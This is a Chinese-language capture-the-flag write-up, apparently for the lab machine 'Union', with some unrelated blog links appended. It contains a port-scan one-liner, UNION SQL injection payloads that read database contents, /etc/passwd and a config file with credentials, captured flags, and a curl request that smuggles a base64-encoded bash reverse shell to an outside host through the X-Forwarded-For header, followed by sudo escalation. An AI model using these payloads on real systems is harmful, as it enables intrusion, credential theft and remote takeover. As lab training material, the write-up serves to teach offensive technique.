[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升

Information Gathering

IP Address Opening Ports
10.10.11.128 TCP:80

$ ip='10.10.11.128'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

player=' union select 9;--±

player=' union select group_concat(schema_name) from information_schema.schemata;--±

player=' union select group_concat(table_name) from information_schema.columns where table_schema='november';--±

player=' union select group_concat(one) from november.flag;--±

UHC{F1rst_5tep_2_Qualify}

http://10.10.11.128/challenge.php

player=' union select group_concat(player) from november.players;--±

ippsec,celesian,big0us,luska,tinyboy
player=' union select load_file('/etc/passwd');--±

player=' union select load_file('/var/www/html/index.php');--±

player=' union select load_file('/var/www/html/config.php');--±

username:uhc

password:uhc-11qual-global-pw

User.txt

1618310a48daa65a153e7ca160f99720

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999

!\] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) \>y

Privilege Escalation:Command Injection && sudo

复制代码
$ curl -X GET "http://10.10.11.128/firewall.php" \
-H "Host: 10.10.11.128" \
-H "Cache-Control: max-age=0" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
-H "Referer: http://10.10.11.128/challenge.php" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: PHPSESSID=34m0q9j1uck8sv7cbstv0vpu6p" \
-H "Connection: close" \
-H "X-Forwarded-For: 1.1.1.1;echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMzLzQ0MyAwPiYx|base64 -d |bash;"

$ sudo su

Root.txt

c6c82ef44b36fad95d3711546e31d86a

相关推荐
x-cmd9 小时前
x-cmd install | Wuzz - Web 开发与安全测试利器,交互式 HTTP 工具
前端·网络协议·安全·http·浏览器·测试·命令行
securitor9 小时前
短信验证码安全需求设计
安全
Komorebi.py11 小时前
RCE学习:一些技巧
学习·安全·rce
DarkLONGLOVE12 小时前
小白也能懂:数据加密函数的进阶封装指南
前端·安全
DarkLONGLOVE12 小时前
小白也能懂:数据加密函数的简单封装教程
前端·安全
极小狐12 小时前
GitLab 中文版17.10正式发布,27项重点功能解读【三】
安全·gitlab·devsecops·devops
ivwdcwso13 小时前
深度解读 AWS IAM:身份访问管理与安全的核心纽带
安全·云计算·aws·iam·身份访问管理
ALLSectorSorft13 小时前
上门家政小程序,认证与安全。
安全·小程序
IYU_13 小时前
VulnHub-FALL通关攻略
安全·web安全·网络安全
秋说13 小时前
【区块链安全 | 第七篇】EVM概念详解
安全·区块链